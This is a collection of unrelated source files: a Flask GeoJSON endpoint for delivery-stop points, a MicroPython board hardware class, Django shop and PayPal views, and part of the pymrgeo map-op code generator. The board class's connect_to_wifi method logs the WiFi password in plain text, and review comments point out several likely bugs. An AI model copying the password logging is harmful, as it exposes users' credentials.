    poligono = polyReparto('', today, cda)
    # Convex hull of the union of the CDA's delivery zones, scaled 1.5x to
    # also capture points close to the zone boundary.
    # poly = Polygon(PolyConvex(poligono))
    poly = affinity.scale(Polygon(PolyConvex(poligono)), xfact=1.5, yfact=1.5)
    # Alternative kept for reference: scale the raw polygon instead of its hull.
    # poly = affinity.scale(Polygon(poligono), xfact=1.1, yfact=1.1)
    # Keep only the frequent points that lie inside the delivery polygon.
    dentro = puntos[puntos.apply(
        lambda row: poly.contains(Point(row.lat, row.lon)), axis=1)]
    # Re-select the matching rows and sort by modal hour.
    dentro_a = dentro.apply(lambda row: puntos[(puntos['lat'] == row['lat']) & (
        puntos['lon'] == row['lon'])].iloc[0], axis=1).sort_values(by='moda')
    # Build one GeoJSON feature per point.
    # NOTE(review): "<NAME>" below looks like a redacted placeholder —
    # restore the intended label (the sibling endpoint uses "Parada Frecuente").
    for i, row in dentro_a.iterrows():
        Export.append({
            "type": "Feature",
            "properties": {
                "name": "<NAME>",
                "moda": str(row[6]).replace(".", ":")+"0",
                "moda_s": str(row[7]).replace(".", ":")+"0",
                "moda_plate": row[8]
                # "poligon": np.array(row[8]).tolist()
            },
            "geometry": {
                "type": "Point",
                "coordinates": [row[5], row[4]]
            }
        })
    return jsonify(Export)
@app.route('/puntos/<ruta>')
def reparto(ruta):
    """Return the frequent-stop points inside a single route's delivery
    zone as GeoJSON Features."""
    Export = []
    # Delivery-zone polygon for this route id
    poligono = polyReparto(ruta)
    # Global stop points inside the mega geozone
    puntos = pd.read_csv('puntos.csv')
    # Scale the polygon 1.2x to also capture points just outside the zone
    poly = affinity.scale(Polygon(poligono), xfact=1.2, yfact=1.2)
    # Keep only the points contained in the (scaled) delivery polygon
    dentro = puntos[puntos.apply(
        lambda row: poly.contains(Point(row.lat, row.lon)), axis=1)]
    # Re-attach full rows for the surviving coordinates, sorted by mode hour
    dentro_a = dentro.apply(lambda row: puntos[(puntos['lat'] == row['lat']) & (
        puntos['lon'] == row['lon'])].iloc[0], axis=1).sort_values(by='moda')
    # Export = dentro_a.to_json(orient='records')
    # Emit one GeoJSON Feature per row (positional columns: 4=lat, 5=lon,
    # 6=moda, 7=moda_s, 8=moda_plate)
    for i, row in dentro_a.iterrows():
        Export.append({
            "type": "Feature",
            "properties": {
                "name": "<NAME>",
                "moda": str(row[6]).replace(".", ":")+"0",
                "moda_s": str(row[7]).replace(".", ":")+"0",
                "moda_plate": row[8]
            },
            "geometry": {
                "type": "Point",
                "coordinates": [row[5], row[4]]
            }
        })
    return jsonify(Export)
def roundDatetime(dt, delta):
    """Round *dt* up to the next multiple of *delta*.

    Multiples are counted from ``datetime.min``; a *dt* already on a
    multiple is returned unchanged.  Used to normalise timestamps before
    computing the most-frequent stop hour.
    """
    remainder = (datetime.min - dt) % delta
    return dt + remainder
def polyReparto(ruta, today="", cda=""):
    """Fetch delivery-zone polygon coordinates from server 4 (SIM).

    Two modes:
      * ``today``/``cda`` given -> vertices of all zones for the CDA's
        routes scheduled on ``today`` (horizontal/tradicional panels only);
      * otherwise -> the zones of the single route id ``ruta``.

    Returns a list of ``(float, float)`` tuples parsed from the third
    column of the first result row ("lat/lon,lat/lon,...").
    """
    # sv4 is a module-level MySQL connection (defined elsewhere in the
    # file); ping(True) reconnects if the link went stale.
    sv4.ping(True)
    cur = sv4.cursor()
    # query = "SELECT * FROM I_Rutas_Zonas WHERE fecha_programada = %s" if today != "" else "SELECT * FROM I_Rutas_Zonas WHERE id_ruta = %s"
    if today != "":
        query = """
            SELECT zr.id, zr.id_ruta, GROUP_CONCAT(zr.vertices) vertice
            FROM I_Rutas_Zonas zr
            LEFT JOIN I_Rutas r ON (r.id=zr.id_ruta)
            LEFT JOIN I_Importacion i ON (i.id=r.id_importacion)
            LEFT JOIN M_Paneles p ON (p.cda_id = i.cda_id AND p.canal_id = i.canal_id AND p.panel_id = r.id_panel)
            WHERE
            i.fecha_programada= %s AND
            i.cda_id = %s AND
            p.tipo = "horizontal" AND
            p.canal_id ="tradicional"
            """
        cur.execute(query, (today, cda))
    else:
        query = "SELECT * FROM I_Rutas_Zonas WHERE id_ruta = %s"
        cur.execute(query, (ruta, ))
    data = cur.fetchall()
    itms = []
    # NOTE(review): assumes at least one row and that column index 2 holds
    # the concatenated vertex string — data[0][2] raises IndexError otherwise.
    itms.append([tuple(float(c) for c in itm.split("/"))
                 for itm in data[0][2].split(",")])
    cur.close()
    return itms[0]
def clusterTime(x):
    """Cluster the stop-time values in *x* with DBSCAN and return a
    representative mode, or 0 when fewer than two clusters yield one."""
    clustering = DBSCAN(eps=2, min_samples=3).fit(x)
    cluster_labels = clustering.labels_
    # NOTE(review): len(set(labels)) also counts DBSCAN's noise label (-1)
    # when present, so range(num_clusters) may include an index with no
    # matching points — confirm this is intended.
    num_clusters = len(set(cluster_labels))
    clusters = pd.Series([x[cluster_labels == n]for n in range(num_clusters)])
    h = []
    for n in range(num_clusters):
        # for i in range(len(clusters[n])):
        # Mode of each cluster; skip clusters for which no mode exists
        moda = stats.mode(clusters[n])
        if len(moda[0]) != 0:
            h.append(moda[0][0][0])
    # NOTE(review): deliberately returns the mode of the *second* cluster
    # (h[1]) when more than one exists — confirm this choice with the author.
    r = h[1] if len(h) > 1 else 0
    return r
def PolyConvex(poligono):
    """Return the convex-hull vertices of a list of 2-D coordinates.

    The vertices are returned as a numpy array of rows taken from the
    input, in the (set-iteration) order of their original indices.
    """
    pts = np.array(poligono)
    hull = ConvexHull(pts)
    vertex_ids = set()
    for a, b in hull.simplices:
        vertex_ids.update((a, b))
    frame = pd.DataFrame(pts)
    return frame.iloc[np.array(list(vertex_ids))].values
if __name__ == '__main__':
    # .get() avoids a KeyError when ENVIRONMENT is unset (e.g. local dev);
    # the server only starts in production, as before.
    if os.environ.get('ENVIRONMENT') == 'production':
        app.run(port=80, host='0.0.0.0')
|
<reponame>idimitrakopoulos/illuminOS
import lib.toolkit as tk
from lib.toolkit import log
class Board:
    """Hardware abstraction for a MicroPython board (pins, WiFi, LED,
    buttons, filesystem, memory management, sleep/reboot)."""

    # Mapping of logical pin names -> machine.Pin objects
    pin_mapping = []
    # Per-button click counters used for single/double-click detection
    button_click_counter = {}

    # @timed_function
    def __init__(self, pin_mapping):
        self.pin_mapping = pin_mapping

    # @timed_function
    def get_pin_mapping(self):
        """Return the whole pin mapping."""
        return self.pin_mapping

    # @timed_function
    def set_pin_mapping(self, pin_mapping):
        """Replace the whole pin mapping."""
        self.pin_mapping = pin_mapping

    # @timed_function
    def get_pin_by_key(self, pin_key):
        """Return the pin registered under *pin_key*."""
        return self.pin_mapping[pin_key]

    # @timed_function
    def set_pin(self, pin_key, pin):
        """Register *pin* under *pin_key*."""
        self.pin_mapping[pin_key] = pin

    # @timed_function
    def get_pin_value(self, pin):
        """Read the current digital value of *pin*."""
        return pin.value()

    # @timed_function
    def scan_wifi(self, mode):
        """Scan for WiFi networks; *mode* is a network.WLAN mode constant."""
        import network
        n = network.WLAN(mode)
        return n.scan()

    # @timed_function
    def connect_to_wifi(self, ssid, password, mode, wait_for_ip=0):
        """Connect to *ssid* and wait up to *wait_for_ip* seconds for an IP.

        Returns the IP string; "0.0.0.0" means no address was obtained.
        """
        import network, time
        log.info("Attempting to connect to WiFi '{}' with password '{}'...".format(ssid, password))
        n = network.WLAN(mode)
        n.active(True)
        n.connect(ssid, password)
        # Wait for IP address to be provided
        count = 0
        while not n.isconnected() and count < wait_for_ip:
            log.info("Waiting to obtain IP ... ({} sec remaining)".format(str(wait_for_ip - count)))
            time.sleep(1)
            count += 1
        # Get provided IP
        ip = n.ifconfig()[0]
        if ip == "0.0.0.0":
            log.info("Could not obtain IP on '{}'".format(ssid))
        else:
            log.info("Connected with IP '{}'".format(ip))
        return ip

    # @timed_function
    def blink_onboard_led(self, times, delay, led):
        """Blink *led* *times* times with *delay* seconds between edges.

        NOTE(review): ends with led.high() described as "off" — presumably
        an active-low onboard LED (common on ESP8266); confirm for this board.
        """
        import time
        # Do blinking
        for i in range(times):
            led.high()
            time.sleep(delay)
            led.low()
            time.sleep(delay)
        # Return to off state
        led.high()

    # @timed_function
    def get_onboard_button_events(self, btn, bcc_key, on_single_click, on_double_click):
        """Count presses of *btn* and dispatch single/double-click handlers.

        Handler names are looked up as attributes of lib.toolkit (tk).
        A one-shot 300 ms timer resets the click counter after each press.
        """
        import gc
        from machine import Timer
        if btn.value() == 0:
            self.button_click_counter[bcc_key] += 1
            if self.button_click_counter[bcc_key] == 1:
                log.info("single-click registered (mem free: " + str(gc.mem_free()) + ")")
                sc = getattr(tk, on_single_click)
                sc()
            elif self.button_click_counter[bcc_key] == 2:
                log.info("double click registered (mem free: " + str(gc.mem_free()) + ")")
                sc = getattr(tk, on_double_click)
                sc()
            else:
                pass
            gtim = Timer(1)
            gtim.init(period=300, mode=Timer.ONE_SHOT, callback=lambda t:self.reset_onboard_button_event_counter(bcc_key))

    # @timed_function
    def reset_onboard_button_event_counter(self, bcc_key):
        """Reset the click counter for *bcc_key* and return its new value (0)."""
        log.info("FBC resetting to 0. Previous was " + str(self.button_click_counter[bcc_key]))
        self.button_click_counter[bcc_key] = 0
        return self.button_click_counter[bcc_key]

    # @timed_function
    def format(self):
        """Recursively delete every file and directory on the filesystem.

        Files are removed directly; when remove() fails the entry is assumed
        to be a directory, which is descended into and removed once empty.
        """
        import uos
        log.info("Formatting filesystem ...")
        while uos.listdir("/"):
            lst = uos.listdir("/")
            uos.chdir("/")
            while lst:
                try:
                    uos.remove(lst[0])
                    log.info("Removed '" + uos.getcwd() + "/" + lst[0] + "'")
                    lst = uos.listdir(uos.getcwd())
                except:
                    # remove() failed -> treat the entry as a directory
                    dir = lst[0]
                    log.info("Directory '" + uos.getcwd() + "/" + dir + "' detected. Opening it...")
                    uos.chdir(dir)
                    lst = uos.listdir(uos.getcwd())
                    if len(lst) == 0:
                        log.info("Directory '" + uos.getcwd() + "' is empty. Removing it...")
                        uos.chdir("..")
                        uos.rmdir(dir)
                        break
        log.info("Format completed successfully")

    def start_memory_manager(self, period=5000):
        """Run mem_cleanup() every *period* milliseconds on hardware Timer 0."""
        from machine import Timer
        tim = Timer(0)
        tim.init(period=period, mode=Timer.PERIODIC, callback=lambda t: self.mem_cleanup())

    def mem_cleanup(self):
        """Force garbage collection and log a warning tier based on free heap."""
        import gc
        log.debug("Invoking garbage collection ...")
        gc.collect()
        mem = gc.mem_free()
        if 6001 <= mem <= 10000:
            log.warn("Memory is low: " + str(mem))
        elif 4001 <= mem <= 6000:
            log.warn("Memory is very low: " + str(mem))
        elif mem < 4000:
            log.critical("Memory is extremely low: {}".format(str(mem)))
        else:
            log.debug("Memory is currently: " + str(mem))

    def get_public_ip(self):
        """Return the board's external IP as reported by myexternalip.com."""
        from lib.toolkit import http_get
        """
        This is a rather hacky way to get the external IP
        but it avoids importing urequests module which is heavy on mem usage.
        """
        s = http_get("http://myexternalip.com/raw")
        ip = ""
        # Read up to 10 lines; the last non-empty line read wins
        for x in range(0, 10):
            ip = (s.readline().decode('ascii')).strip("\n")
        return ip

    def sleep(self, milliseconds):
        """Deep-sleep for *milliseconds*, waking via RTC alarm."""
        # To be able to use this fea
        import machine
        # configure RTC.ALARM0 to be able to wake the device
        rtc = machine.RTC()
        rtc.irq(trigger=rtc.ALARM0, wake=machine.DEEPSLEEP)
        # set RTC.ALARM0 to fire after some milliseconds
        rtc.alarm(rtc.ALARM0, milliseconds)
        # put the device to sleep
        machine.deepsleep()

    def reboot(self):
        """Hard-reset the board."""
        log.info("Rebooting board ...")
        import machine
        machine.reset()
#!/usr/bin/python
# -*- coding: utf-8 -*-
import json,time
from django.contrib.auth.models import User
from django.conf import settings
from django.http import HttpResponse as response
from django.http import HttpResponseRedirect as redirect
from django.shortcuts import render
from paypal.standard.forms import PayPalPaymentsForm
from paypal.standard.ipn.signals import payment_was_successful
from shipping import fretefacil,correios
from datetime import datetime
from socialize.models import Profile
from shipping.models import Deliverable
from efforia.views import *
from efforia.main import Efforia
from feedly.models import Basket
from app import Images
from models import Product
class Cancel(Efforia):
    """Handler that aborts a purchase: clears the user's cart and goes home."""
    def __init__(self): pass
    def cancel(self,request):
        """Delete all cart items of the current user, then redirect to '/'.

        The redirect is now *returned* (previously its result was discarded),
        matching Deliveries.create_package's use of self.redirect.
        """
        u = self.current_user(request)
        Cart.objects.all().filter(user=u).delete()
        return self.redirect('/')
class Payments(Efforia):
    """PayPal credit-recharge views."""
    def __init__(self): pass
    def view_recharge(self,request):
        """Render the recharge page with a preconfigured PayPal form."""
        paypal_dict = {
            "business": settings.PAYPAL_RECEIVER_EMAIL,
            "amount": "1.19",
            "item_name": "Créditos do Efforia",
            "invoice": "unique-invoice-id",
            "notify_url": "http://www.efforia.com.br/paypal",
            "return_url": "http://www.efforia.com.br/",
            "cancel_return": "http://www.efforia.com.br/cancel",
            'currency_code': 'BRL',
            'quantity': '1'
        }
        payments = PayPalPaymentsForm(initial=paypal_dict)
        # CreditForm presumably comes in via the wildcard import from
        # efforia.views — TODO confirm
        form = CreditForm()
        return render(request,"recharge.jade",{'form':payments,'credit':form},content_type='text/html')
    def update_credit(self,request):
        """Deduct credit from the current user, optionally transferring it
        to another user ('other'), then award activity points.

        NOTE(review): request.POST['credit'][0] indexes the first *character*
        of the posted string (multi-digit values would be truncated) —
        confirm the client always posts a single digit, or this is a bug.
        """
        value = int(request.POST['credit'][0])
        current_profile = Profile.objects.all().filter(user=self.current_user(request))[0]
        # Not enough credit: send the user back to the recharge page
        if value > current_profile.credit: return self.view_recharge(request)
        else:
            current_profile.credit -= value
            current_profile.save()
            if 'other' in request.POST:
                # Transfer the same amount to the other user's profile
                iden = int(request.POST['other'][0])
                u = User.objects.all().filter(id=iden)[0]
                p = Profile.objects.all().filter(user=u)[0]
                p.credit += value
                p.save()
            self.accumulate_points(1,request)
            return response('')
class Mail(Efforia,correios.Correios):
    """Shipping-quote view combining Correios address lookup and
    FreteFacil delivery pricing."""
    def __init__(self): pass
    def postal_code(self,request):
        """Look up the buyer's postal code, quote the shipping cost, persist
        a Deliverable for the purchased object, and return an HTML snippet
        with the address fields and the quoted value."""
        u = self.current_user(request)
        s = ''; mail_code = request.GET['address']
        # Correios address lookup for the given CEP (postal code)
        q = self.consulta(mail_code)[0]
        # Quote from origin CEP 91350-180 with fixed 30x30x30 cm, 0.5 kg
        d = fretefacil.create_deliverable('91350-180',mail_code,'30','30','30','0.5')
        value = fretefacil.delivery_value(d)
        formatted = '<div>Valor do frete: R$ <div style="display:inline;" class="delivery">%s</div></div>' % value
        for i in q.values(): s += '<div>%s\n</div>' % i
        s += formatted
        # Resolve the purchased object ("<Model>$$<date>" naming convention)
        now,objs,rels = self.get_object_bydate(request.GET['object'],'$$')
        obj = globals()[objs].objects.all().filter(date=now)[0]
        # NOTE(review): d['weight'][0] takes the first element/character of
        # the weight value — for the string '0.5' that is '0', making the
        # stored weight 0 g; confirm the structure returned by
        # fretefacil.create_deliverable.
        deliverable = Deliverable(product=obj,buyer=u,mail_code=mail_code,code=d['sender'],receiver=d['receiver'],
                                  height=int(d['height']),length=int(d['length']),width=int(d['width']),weight=int(float(d['weight'][0])*1000.0),value=value)
        deliverable.save()
        return response(s)
class Deliveries(Efforia):
    """Checkout/delivery views."""
    def __init__(self): pass
    def view_package(self,request):
        """Render the delivery page with a PayPal form sized by the
        requested quantity; 'credit' in the query string is the price in
        user credits, discounted by the user's current balance."""
        u = self.current_user(request)
        form = DeliveryForm()
        form.fields['address'].label = 'CEP'
        if 'quantity' in request.GET:
            quantity = request.GET['quantity']
            credit = int(request.GET['credit'])
        else:
            quantity = 1; credit = 1
        paypal_dict = {
            "business": settings.PAYPAL_RECEIVER_EMAIL,
            "amount": "1.00",
            "item_name": "Produto do Efforia",
            "invoice": "unique-invoice-id",
            "notify_url": "http://www.efforia.com.br/paypal",
            "return_url": "http://www.efforia.com.br/delivery",
            "cancel_return": "http://www.efforia.com.br/cancel",
            'currency_code': 'BRL',
            'quantity': quantity,
        }
        payments = PayPalPaymentsForm(initial=paypal_dict)
        # Amount the user still has to pay after spending available credit
        diff = credit-u.profile.credit
        if diff < 0: diff = 0
        return render(request,"delivery.jade",{
            'payments':payments,
            'credit':diff,
            'form':form
        },content_type='text/html')
    def create_package(self,request):
        """Finalize the purchase: empty the cart and go back home."""
        u = self.current_user(request)
        Cart.objects.all().filter(user=u).delete()
        return self.redirect('/')
class SpreadBasket(Basket):
    """Basket specialization; product() is an unimplemented stub."""
    def product(self,prodid):
        """Stub — intended to aggregate quantity/value for *prodid*
        (see the commented-out sketch); currently does nothing."""
        # for p in basket:
        #    quantity += p.quantity
        #    value += p.product.credit*p.quantity
        pass
class Store(Efforia):
    """Product catalog, creation and image-upload views."""
    def __init__(self): pass
    def view_product(self,request):
        """Dispatch on query parameters:
        'action' -> grid of the user's deliverables (or all products when
        none exist or 'more' is passed); 'product' -> single product page;
        otherwise -> the product-creation page."""
        u = self.current_user(request)
        if 'action' in request.GET:
            deliver = list(Deliverable.objects.all().filter(buyer=u))
            if not len(deliver) or 'more' in request.GET:
                products = list(Product.objects.all())
                return self.render_grid(list(products),request)
            else: return self.render_grid(deliver,request)
        elif 'product' in request.GET:
            # NOTE(review): local name shadows the builtin id();
            # request.REQUEST was removed in Django 1.9 — confirm the
            # project's Django version.
            id = int(request.REQUEST['product'])
            prod = Product.objects.all().filter(id=id)[0]
            return render(request,'productview.jade',{'product':prod})
        else:
            return render(request,'product.jade',{'static_url':settings.STATIC_URL},content_type='text/html')
    def create_product(self,request):
        """Create a Product from the posted fields; the category index is
        resolved against the locale list in static elements.json, and the
        name is prefixed with '$$' (date-lookup convention used elsewhere).
        Redirects to the image-upload step."""
        u = self.current_user(request)
        e = json.load(open('%s/json/elements.json'%settings.STATIC_ROOT))
        c = request.REQUEST['category']
        category = e['locale_cat'].index(c)
        credit = request.REQUEST['credit']
        name = request.REQUEST['name']
        description = request.REQUEST['description']
        product = Product(category=category,credit=credit,visual='',
                          name='$$%s'%name,description=description,user=u)
        product.save()
        return redirect('productimage')
    def view_image(self,request):
        """Render the image-upload page."""
        return render(request,'upload.jade',{'static_url':settings.STATIC_URL})
    def create_image(self,request):
        """Upload an image and attach its URL to the user's most recently
        created product."""
        images = Images()
        u = self.current_user(request)
        url = images.upload_image(request)
        products = Product.objects.filter(user=u)
        latest = list(products)[-1:][0]
        latest.visual = url
        latest.save()
        return response("Product created successfully")
#payment_was_successful.connect(confirm_payment)
|
<reponame>ngageoint/mrgeo<gh_stars>100-1000
from __future__ import print_function
import re
import sys
import traceback
from py4j.java_gateway import JavaClass, java_import
from pymrgeo.code_generator import CodeGenerator
from pymrgeo.instance import is_instance_of
from pymrgeo.java_gateway import is_remote
from pymrgeo.rastermapop import RasterMapOp
from pymrgeo.vectormapop import VectorMapOp
# Some MrGeo map ops include operators as their function name. Each
# of those operators work in command-line map algebra. This data
# structure determines how/if those operators are overloaded in
# Python for MrGeo.
#
# The key is the name/symbol of the operator. The value is an array
# of two elements, the first being an array of python "magic methods"
# to map the operator to when the left-hand operand is "self" (e.g. an
# image or vector map op). The second element is an array of python
# "magic methods" to map to the operator when the right-hand operand
# is "self" (e.g. "2 ** image"). For operators where operand ordering
# does not matter (e.g. +, *, etc...) or there is only one operand,
# the second element is an empty array. For operators that cannot be
# overridden in python, both elements of the array are empty arrays.
#
# A scenario where this is important is with the expression "image ** 2"
# compared to "2 ** image". In the first case, python will invoke the
# __pow__ magic mathod on the image object (so image is "self" when the
# method is called. In the second case, python will invoke __rand__ again
# where "self" is image. However, in that case, our overridden method
# needs to invoke map algebra on the Java/Scala side with the arguments
# reversed.
_operators = {"+": [["__add__", "__iadd__", "__radd__"], []],
"-": [["__sub__", "__isub__"], ["__rsub__"]],
"*": [["__mul__", "__imul__", "__rmul__"], []],
"/": [["__div__", "__truediv__", "__idiv__", "__itruediv__"], ["__rdiv__", "__rtruediv__"]],
"//": [[], []], # floor div
"**": [["__pow__", "__ipow__"], ["__rpow__"]], # pow
"=": [], # assignment, can't do!
"<": [["__lt__"], []],
"<=": [["__le__"], []],
">": [["__gt__"], []],
">=": [["__ge__"], []],
"==": [["__eq__"], []],
"!=": [["__ne__"], []],
"<>": [[], []],
"!": [[], []],
"&&": [[], []], # can't override logical and
"&": [["__and__", "__iand__", "__rand__"], []],
"||": [[], []], # can't override logical or
"|": [["__or__", "__ior__", "__ror__"], []],
"~": [["__invert__"], []],
"^": [["__xor__", "__ixor__", "__rxor__"], []],
"^=": [[], []]}
_reserved = ["or", "and", "str", "int", "long", "float", "bool"]
_mapop_code = {}
_rastermapop_code = {}
_vectormapop_code = {}
_initialized = False
def _exceptionhook(ex_cls, ex, tb, method_name=None):
    """sys.excepthook replacement that maps frames from generated map-op
    code (files named "<method>.py") back to the cached generated source,
    highlighting the failing line; other frames print normally.

    The Py2-only ``dict.has_key`` calls were replaced with ``in`` (works
    on both Python 2 and 3; same semantics).
    """
    stack = traceback.extract_tb(tb)
    print(ex_cls.__name__ + ' (' + str(ex) + ')', file=sys.stderr)
    for st in stack:
        file = st[0]
        line = st[1]
        method = st[2]
        srccode = st[3]
        cls = None
        code = None
        # Generated code is attributed to a pseudo-file "<method>.py";
        # look the method up in the generator caches.
        if file == method + '.py':
            if method in _rastermapop_code:
                code = _rastermapop_code[method]
                cls = 'RasterMapOp'
            elif method in _vectormapop_code:
                code = _vectormapop_code[method]
                cls = 'VectorMapOp'
            elif method in _mapop_code:
                code = _mapop_code[method]
                cls = 'MapOp'
            else:
                pass
        if code:
            # Re-generate the source and print it with the failing line marked
            print(' File <' + cls + '.internal>, line ' +
                  str(line) + ', in ' + cls + '.' + method.strip(), file=sys.stderr)
            srccode = code.generate().split('\n')
            cnt = 1
            for c in srccode:
                if cnt == line:
                    print('==> ' + c + ' <==', file=sys.stderr)
                else:
                    print('    ' + c, file=sys.stderr)
                cnt += 1
        else:
            print(' File "' + file.strip() + '", line ' +
                  str(line) + ', in ' + method.strip(), file=sys.stderr)
            print('   ' + srccode.strip() if srccode else "<unknown file>", file=sys.stderr)
    print(''.join(traceback.format_tb(tb)))
    print('{0}: {1}'.format(ex_cls, ex))


# Always setup the hook
sys.excepthook = _exceptionhook
def generate(mrgeo, gateway, gateway_client):
    """Discover all MrGeo map-op classes over the py4j gateway and attach
    generated Python wrapper methods to the mrgeo object and to
    RasterMapOp/VectorMapOp.  On repeat calls only re-attaches cached code.
    """
    global _initialized
    if _initialized:
        # Make sure the object have the proper code in them. In case somewhere we've made a new mrgeo object
        for method_name, code in _mapop_code.items():
            if not hasattr(mrgeo, method_name):
                setattr(mrgeo, method_name, code.compile(method_name).get(method_name))
        for method_name, code in _rastermapop_code.items():
            if not hasattr(RasterMapOp, method_name):
                setattr(RasterMapOp, method_name, code.compile(method_name).get(method_name))
        for method_name, code in _vectormapop_code.items():
            if not hasattr(VectorMapOp, method_name):
                setattr(VectorMapOp, method_name, code.compile(method_name).get(method_name))
        return
    jvm = gateway.jvm
    client = gateway_client
    # Import the Java classes the generated code will reference
    java_import(jvm, "org.mrgeo.job.*")
    java_import(jvm, "org.mrgeo.mapalgebra.MapOpFactory")
    java_import(jvm, "org.mrgeo.mapalgebra.raster.RasterMapOp")
    java_import(jvm, "org.mrgeo.mapalgebra.vector.VectorMapOp")
    java_import(jvm, "org.mrgeo.mapalgebra.raster.MrsPyramidMapOp")
    java_import(jvm, "org.mrgeo.mapalgebra.IngestImageMapOp")
    java_import(jvm, "org.mrgeo.mapalgebra.ExportMapOp")
    java_import(jvm, "org.mrgeo.mapalgebra.PointsMapOp")
    java_import(jvm, "org.mrgeo.mapalgebra.MapOp")
    java_import(jvm, "org.mrgeo.utils.SparkUtils")
    java_import(jvm, "org.mrgeo.hdfs.utils.HadoopFileUtils")
    java_import(jvm, "org.mrgeo.data.*")
    mapops = jvm.MapOpFactory.getMapOpClasses()
    for rawmapop in mapops:
        mapop = str(rawmapop.getCanonicalName().rstrip('$'))
        # Skip IngestImageMapOp because there is an explicit method defined in
        # MrGeo class for ingesting an image, and _get_instance_type will raise
        # an exception when run against that map op.
        if not mapop.endswith(".IngestImageMapOp") and not mapop.endswith(".InlineCsvMapOp"):
            java_import(jvm, mapop)
            cls = JavaClass(mapop, gateway_client=client)
            signatures = jvm.MapOpFactory.getSignatures(mapop)
            instance = _get_instance_type(signatures, gateway, cls, mapop)
            # for s in signatures:
            #     print("signature: " + s)
            for method in cls.register():
                ooCodes = None
                procCodes = None
                if method is not None:
                    name = method.strip().lower()
                    if len(name) > 0:
                        if name in _reserved:
                            # print("reserved: " + name)
                            continue
                        elif name in _operators:
                            # print("operator: " + name)
                            ooCodes = _generate_operator_code(mapop, name, signatures, instance)
                        else:
                            # print("method: " + name)
                            ooCodes = _generate_oo_method_code(gateway, client, mapop, name, signatures, instance)
                            procCodes = _generate_procedural_method_code(gateway, client, mapop, name, signatures,
                                                                         instance)
                if ooCodes is not None:
                    # Attach object-oriented wrappers to the matching map-op class
                    for method_name, code in ooCodes.items():
                        # if method_name == "export":
                        #     print(code.generate(), file=sys.stderr)
                        if instance == 'RasterMapOp':
                            _rastermapop_code[method_name] = code
                            setattr(RasterMapOp, method_name, code.compile(method_name).get(method_name))
                        elif instance == "VectorMapOp":
                            _vectormapop_code[method_name] = code
                            setattr(VectorMapOp, method_name, code.compile(method_name).get(method_name))
                        elif is_instance_of(gateway, cls, jvm.MapOp):
                            # Generic MapOp: attach to both wrapper classes
                            # _mapop_code[method_name] = code
                            _rastermapop_code[method_name] = code
                            setattr(RasterMapOp, method_name, code.compile(method_name).get(method_name))
                            _vectormapop_code[method_name] = code
                            setattr(VectorMapOp, method_name, code.compile(method_name).get(method_name))
                if procCodes is not None:
                    # Attach procedural-style wrappers directly to the mrgeo object
                    for method_name, code in procCodes.items():
                        print(method_name)
                        _mapop_code[method_name] = code
                        setattr(mrgeo, method_name, code.compile(method_name).get(method_name))
    _initialized = True
    print("add: " + str(hasattr(mrgeo, "add")))
def _get_instance_type(signatures, gateway, cls, mapop):
    """Determine which wrapper class ('RasterMapOp', 'VectorMapOp' or
    'MapOp') should own the generated methods for *mapop*, by checking
    which map-op parameter type appears in every signature.

    Raises Exception when no single type is common to all signatures.
    (Py2-only ``dict.iteritems()`` was replaced with ``items()`` — works on
    both Python 2 and 3 and matches generate()'s existing usage.)
    """
    type_map = {'RasterMapOp': 0, 'VectorMapOp': 0, 'MapOp': 0}
    for sig in signatures:
        has_type = {'RasterMapOp': False, 'VectorMapOp': False, 'MapOp': False}
        for variable in sig.split("|"):
            # variable looks like "name:type" or "name:type=default"
            names = re.split("[:=]+", variable)
            new_type = names[1][names[1].rfind('.') + 1:]
            # A trailing '*' marks a vararg parameter
            if new_type.endswith("*"):
                new_type = new_type[:-1]
            if new_type == 'RasterMapOp' or new_type == 'VectorMapOp' or new_type == 'MapOp':
                has_type[new_type] = True
        for t, v in has_type.items():
            if v:
                type_map[t] += 1
    # Make sure that all of the signatures have an argument of one of the map op types.
    # If the map op is either RasterMapOp or VectorMapOp, and all of the signatures have
    # an argument of that type, then use that for the instance type.
    if is_instance_of(gateway, cls, 'org.mrgeo.mapalgebra.raster.RasterMapOp'):
        if type_map['RasterMapOp'] == len(signatures):
            return 'RasterMapOp'
    elif is_instance_of(gateway, cls, 'org.mrgeo.mapalgebra.vector.VectorMapOp'):
        if type_map['VectorMapOp'] == len(signatures):
            return 'VectorMapOp'
    # There is at least one signature that does not include a parameter of the same type
    # as the map op itself. Instead, we get a type that is represented in all the signatures.
    for t, v in type_map.items():
        if v == len(signatures):
            return t
    msg = 'Cannot determine an instance type to use for ' + mapop
    print(msg)
    raise Exception(msg)
def _generate_operator_code(mapop, name, signatures, instance):
    """Generate python magic-method wrappers (e.g. __add__/__radd__) for the
    operator *name* of the Java map-op *mapop*.

    Returns a dict of {magic_method_name: CodeGenerator}, or None when the
    signatures produce no methods.  Raises for operators with more than
    two operands.
    """
    methods = _generate_methods(instance, signatures)
    if len(methods) == 0:
        return None
    # need to change the parameter names to "other" for all except us
    corrected_methods = []
    for method in methods:
        new_method = []
        if len(method) > 2:
            raise Exception("The parameters for an operator can only have 1 or 2 parameters")
        for param in method:
            # param tuple layout: (name, type, call_name, default, is_vararg)
            lst = list(param)
            if lst[1].lower() == 'string' or \
                    lst[1].lower() == 'double' or \
                    lst[1].lower() == 'float' or \
                    lst[1].lower() == 'long' or \
                    lst[1].lower() == 'int' or \
                    lst[1].lower() == 'short' or \
                    lst[1].lower() == 'char' or \
                    lst[1].lower() == 'boolean':
                lst[0] = "other"
                lst[2] = "other"
            # need to add this to the start of the list (in case we eventually check other.mapop from the elif
            elif lst[2] != "self":
                lst[0] = "other"
                lst[2] = "other"
            new_method.append(tuple(lst))
        corrected_methods.append(new_method)
    codes = {}
    # op_index 0 = left-hand magic methods, 1 = reversed (right-hand) ones
    for op_index in range(0, 2):
        for mname in _operators[name][op_index]:
            generator = CodeGenerator()
            # Signature: unary operators take only self
            if len(corrected_methods) == 1:
                generator.write("def " + mname + "(self):", post_indent=True)
            else:
                generator.write("def " + mname + "(self, other):", post_indent=True)
            _generate_imports(generator, mapop)
            _generate_calls(generator, corrected_methods, is_reverse=True if op_index == 1 else False)
            _generate_run(generator, instance)
            codes[mname] = generator
    return codes
def _generate_oo_method_code(gateway, client, mapop, name, signatures, instance):
    """Generate an object-oriented wrapper method (self-first signature) for
    the Java map-op *mapop* and return {name: CodeGenerator}, or None when
    the signatures produce no methods."""
    methods = _generate_methods(instance, signatures)
    jvm = gateway.jvm
    cls = JavaClass(mapop, gateway_client=client)
    # Export map ops running against a remote gateway need the extra
    # save-raster download path appended by _generate_run
    is_export = is_remote() and is_instance_of(gateway, cls, jvm.ExportMapOp)
